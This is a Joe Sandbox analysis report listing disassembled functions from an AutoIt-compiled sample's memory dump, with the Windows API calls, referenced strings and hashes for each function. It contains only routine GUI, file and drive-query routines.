Opcode ID: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
Instruction ID: b10a44ee874cd31bbae6200e561cce5ee65a37cbd2923e63fd0e811f179534b0
Opcode Fuzzy Hash: edfd845b4db257ec403ecf9dfd831cad4244c5ce6c4889a0281a109b7ff2072b
Instruction Fuzzy Hash: DC614861F3874B66EB345D288895BBF3394DF41708F10091AE882DB2C3DA91BE72C755

Function 00207CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
Instruction ID: 8c870ce9cc5ece581700b7947ca5bf49aaaaf39a8f0e42e508c9c3bd69816410
Opcode Fuzzy Hash: 207ad3c5d84221c7009bf231d04418d9e3ddb1607dee0175769e8ab51e14d55f
Instruction Fuzzy Hash: 9A615B71E3870B67DB384E288895BBF2394AF42700F100959E982DB6C3EB52FD72C655

Function 00201706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 663d820b58a678f186be9961c9036eb81b454c93028b54b4952bd094991c11fd
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 0E8198325281A34EEB2D4A79857443EFFE15A923A131A079DD4F2CB1D3EE24C674D620

Function 00262ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00262B30
DeleteObject.GDI32(00000000), ref: 00262B43
DestroyWindow.USER32 ref: 00262B52
GetDesktopWindow.USER32 ref: 00262B6D
GetWindowRect.USER32(00000000), ref: 00262B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00262CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00262CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262CF8
GetClientRect.USER32(00000000,?), ref: 00262D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00262D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D80
GlobalLock.KERNEL32(00000000), ref: 00262D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262D98
GlobalUnlock.KERNEL32(00000000), ref: 00262DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DA8
GlobalFree.KERNEL32(00000000), ref: 00262DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0027FC38,00000000), ref: 00262DDB
GlobalFree.KERNEL32(00000000), ref: 00262DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00262E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00262E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00262E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0026303F

Strings

, xrefs: 00262FC5
static, xrefs: 00262D3A, 00262E91
DISPLAY, xrefs: 00262EA2
AutoIt v3, xrefs: 00262CF2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
Instruction ID: 07840734cb572652ffd9b797c4735b38b60f2a34b5a74e1a52897f226bee18a7
Opcode Fuzzy Hash: d4ecd57139288a69916aa6c8352bfde85cf8ef6c9c7caa0b9e605f0395828364
Instruction Fuzzy Hash: 1C029C71910605EFDB14DF64EC8DEAE7BB9EF48310F148158F919AB2A1DB70AD84CB60

Function 002770D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0027712F
GetSysColorBrush.USER32(0000000F), ref: 00277160
GetSysColor.USER32(0000000F), ref: 0027716C
SetBkColor.GDI32(?,000000FF), ref: 00277186
SelectObject.GDI32(?,?), ref: 00277195
InflateRect.USER32(?,000000FF,000000FF), ref: 002771C0
GetSysColor.USER32(00000010), ref: 002771C8
CreateSolidBrush.GDI32(00000000), ref: 002771CF
FrameRect.USER32(?,?,00000000), ref: 002771DE
DeleteObject.GDI32(00000000), ref: 002771E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00277230
FillRect.USER32(?,?,?), ref: 00277262
GetWindowLongW.USER32(?,000000F0), ref: 00277284

Part of subcall function 002773E8: GetSysColor.USER32(00000012), ref: 00277421
Part of subcall function 002773E8: SetTextColor.GDI32(?,?), ref: 00277425
Part of subcall function 002773E8: GetSysColorBrush.USER32(0000000F), ref: 0027743B
Part of subcall function 002773E8: GetSysColor.USER32(0000000F), ref: 00277446
Part of subcall function 002773E8: GetSysColor.USER32(00000011), ref: 00277463
Part of subcall function 002773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
Part of subcall function 002773E8: SelectObject.GDI32(?,00000000), ref: 00277482
Part of subcall function 002773E8: SetBkColor.GDI32(?,00000000), ref: 0027748B
Part of subcall function 002773E8: SelectObject.GDI32(?,?), ref: 00277498
Part of subcall function 002773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
Part of subcall function 002773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
Part of subcall function 002773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 114c3fd19c7bccbce79261f99f0e5a495e30f2efcec1f949ee516420bdb6508f
Instruction ID: d81d310abcd9489c077dfe015a8c15e303af32b4d56363f9749500444f12aaec
Opcode Fuzzy Hash: 114c3fd19c7bccbce79261f99f0e5a495e30f2efcec1f949ee516420bdb6508f
Instruction Fuzzy Hash: 52A1A272018302AFD7109F70EC4CA5B7BA9FF49320F604A2DF96AA61E1D771E994CB51

Function 001F8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 001F8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00236AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00236AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00236F43

Part of subcall function 001F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001F8BE8,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8FC5

SendMessageW.USER32(?,00001053), ref: 00236F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00236F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00236FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00236FB7

Strings

0, xrefs: 00236DCF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: d6242bde5bd85432ea8b16ea2ac08695edcaf1bc3baa005686e2efdac7dcd442
Instruction ID: 7f036285969400601c47bba5632e041b91829b2a83bd61cc9eeb3c694cbf09e2
Opcode Fuzzy Hash: d6242bde5bd85432ea8b16ea2ac08695edcaf1bc3baa005686e2efdac7dcd442
Instruction Fuzzy Hash: 8812DE70210646EFDB25CF24D89CBB5B7E9FB44300F548529E5899B662CB31ECA2CF91

Function 00262711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0026273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0026286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002628A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002628B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00262900
GetClientRect.USER32(00000000,?), ref: 0026290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00262955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00262964
GetStockObject.GDI32(00000011), ref: 00262974
SelectObject.GDI32(00000000,00000000), ref: 00262978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00262988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00262991
DeleteDC.GDI32(00000000), ref: 0026299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002629C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002629DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00262A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00262A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00262A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00262A77
GetStockObject.GDI32(00000011), ref: 00262A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00262A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00262A97

Strings

static, xrefs: 0026294F, 00262A71
msctls_progress32, xrefs: 00262A13
DISPLAY, xrefs: 0026295A
AutoIt v3, xrefs: 002628F8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
Instruction ID: 38a28f9c58b7e27d659387f92281a712651c845839ce55acdb4c117d70c6acb4
Opcode Fuzzy Hash: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
Instruction Fuzzy Hash: 85B15D71A10605AFEB14DF78EC89FAEBBA9EF48710F104258F915E7290D770AD50CBA0

Function 00254ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00254AED
GetDriveTypeW.KERNEL32(?,0027CB68,?,\\.\,0027CC08), ref: 00254BCA
SetErrorMode.KERNEL32(00000000,0027CB68,?,\\.\,0027CC08), ref: 00254D36

Strings

CDROM, xrefs: 00254BFB
Unknown, xrefs: 00254BED, 00254C83
Removable, xrefs: 00254C10, 00254C15
RAID, xrefs: 00254CBB
SAS, xrefs: 00254CC9
Fixed, xrefs: 00254C09
iSCSI, xrefs: 00254CC2
SSA, xrefs: 00254CA6
Network, xrefs: 00254C02
SCSI, xrefs: 00254C8A
Virtual, xrefs: 00254CE5
RAMDisk, xrefs: 00254BF4
SATA, xrefs: 00254CD0
USB, xrefs: 00254CB4
ATAPI, xrefs: 00254C91
ATA, xrefs: 00254C98
FileBackedVirtual, xrefs: 00254CEC
MMC, xrefs: 00254CDE
SSD, xrefs: 00254C4A
1394, xrefs: 00254C9F
PhysicalDrive, xrefs: 00254B76
\\.\, xrefs: 00254B3F
Fibre, xrefs: 00254CAD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
Instruction ID: 10ea7f284131987e3e3361fb1734332197813f3543c505b63f25dd19210a5efa
Opcode Fuzzy Hash: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
Instruction Fuzzy Hash: 4F610630635506ABCB04FF24C98596CF7B1AB8634BB284116FC06AB291CF71DDE9DB49

Function 002773E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00277421
SetTextColor.GDI32(?,?), ref: 00277425
GetSysColorBrush.USER32(0000000F), ref: 0027743B
GetSysColor.USER32(0000000F), ref: 00277446
CreateSolidBrush.GDI32(?), ref: 0027744B
GetSysColor.USER32(00000011), ref: 00277463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
SelectObject.GDI32(?,00000000), ref: 00277482
SetBkColor.GDI32(?,00000000), ref: 0027748B
SelectObject.GDI32(?,?), ref: 00277498
InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0027752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00277554
InflateRect.USER32(?,000000FD,000000FD), ref: 00277572
DrawFocusRect.USER32(?,?), ref: 0027757D
GetSysColor.USER32(00000011), ref: 0027758E
SetTextColor.GDI32(?,00000000), ref: 00277596
DrawTextW.USER32(?,002770F5,000000FF,?,00000000), ref: 002775A8
SelectObject.GDI32(?,?), ref: 002775BF
DeleteObject.GDI32(?), ref: 002775CA
SelectObject.GDI32(?,?), ref: 002775D0
DeleteObject.GDI32(?), ref: 002775D5
SetTextColor.GDI32(?,?), ref: 002775DB
SetBkColor.GDI32(?,?), ref: 002775E5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b18dbc89fade8d16cf162df1466a4a4921d73c729574caa836a16c4ec912b230
Instruction ID: 1a18e159cb52d83d0d52bb0d07567f01f83afe5f4964d7d30fa5b87bf98fda8e
Opcode Fuzzy Hash: b18dbc89fade8d16cf162df1466a4a4921d73c729574caa836a16c4ec912b230
Instruction Fuzzy Hash: F8614272900219AFDF119FA4DC49AEE7F79EB08320F218125F919B72A1D7759990CF90

Function 00270FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00271128
GetDesktopWindow.USER32 ref: 0027113D
GetWindowRect.USER32(00000000), ref: 00271144
GetWindowLongW.USER32(?,000000F0), ref: 00271199
DestroyWindow.USER32(?), ref: 002711B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002711ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0027120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0027121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00271232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00271245
IsWindowVisible.USER32(00000000), ref: 002712A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002712BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002712D0
GetWindowRect.USER32(00000000,?), ref: 002712E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0027130E
GetMonitorInfoW.USER32(00000000,?), ref: 00271328
CopyRect.USER32(?,?), ref: 0027133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002713AA

Strings

0, xrefs: 002710D3
(, xrefs: 0027131B
tooltips_class32, xrefs: 002711E6

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
Instruction ID: c4019239c460d443752776e00630d213cdf5a3da24cfb16ff920b9dfbc50a74e
Opcode Fuzzy Hash: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
Instruction Fuzzy Hash: 02B18971618341AFD704DF69D889B6EBBE4EF84310F00891CF99D9B2A1CB71E864CB91

Function 00270241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002702E5
_wcslen.LIBCMT ref: 0027031F
_wcslen.LIBCMT ref: 00270389
_wcslen.LIBCMT ref: 002703F1
_wcslen.LIBCMT ref: 00270475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002704C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00270504

Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD

Part of subcall function 0024223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00242258
Part of subcall function 0024223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0024228A

Strings

GETITEMCOUNT, xrefs: 00270316, 00270337
SELECTCLEAR, xrefs: 0027052D
SELECTINVERT, xrefs: 0027057E
VIEWCHANGE, xrefs: 00270675
GETSELECTEDCOUNT, xrefs: 00270470, 0027048B
GETSUBITEMCOUNT, xrefs: 00270384, 0027039F
ISSELECTED, xrefs: 002704DD
GETTEXT, xrefs: 002703EC, 00270407
GETSELECTED, xrefs: 002705E1
DESELECT, xrefs: 0027059C
SELECT, xrefs: 00270548
SELECTALL, xrefs: 00270515
FINDITEM, xrefs: 00270627

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
Instruction ID: 399f1b9f37ac3a7e353928746708e00fec25ddea3c5f99ddb24fa06f2298bf68
Opcode Fuzzy Hash: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
Instruction Fuzzy Hash: 7FE1C131228642DFC714DF25C89083EB3E6BF98314F54895DF89A9B2A1DB70ED5ACB41

Function 001F8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F8968
GetSystemMetrics.USER32(00000007), ref: 001F8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F899B
GetSystemMetrics.USER32(00000008), ref: 001F89A3
GetSystemMetrics.USER32(00000004), ref: 001F89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001F89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001F89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001F8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001F8A3C
GetClientRect.USER32(00000000,000000FF), ref: 001F8A5A
GetStockObject.GDI32(00000011), ref: 001F8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 001F8A81

Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D

SetTimer.USER32(00000000,00000000,00000028,001F90FC), ref: 001F8AA8

Strings

AutoIt v3 GUI, xrefs: 001F8A20

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c6637f69d4647756d41f2057755c2a985441f89b2002950665831bae911ddc71
Instruction ID: b99d2fbe9adc8aa6a58c7610a5e5b34fb010e9589eccb71702b933bcb433b4c5
Opcode Fuzzy Hash: c6637f69d4647756d41f2057755c2a985441f89b2002950665831bae911ddc71
Instruction Fuzzy Hash: EEB18F71A0020AAFDF14DFA8DC99BAE7BB5FB48314F504229FA15A7290DB70E951CF50

Function 00240D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
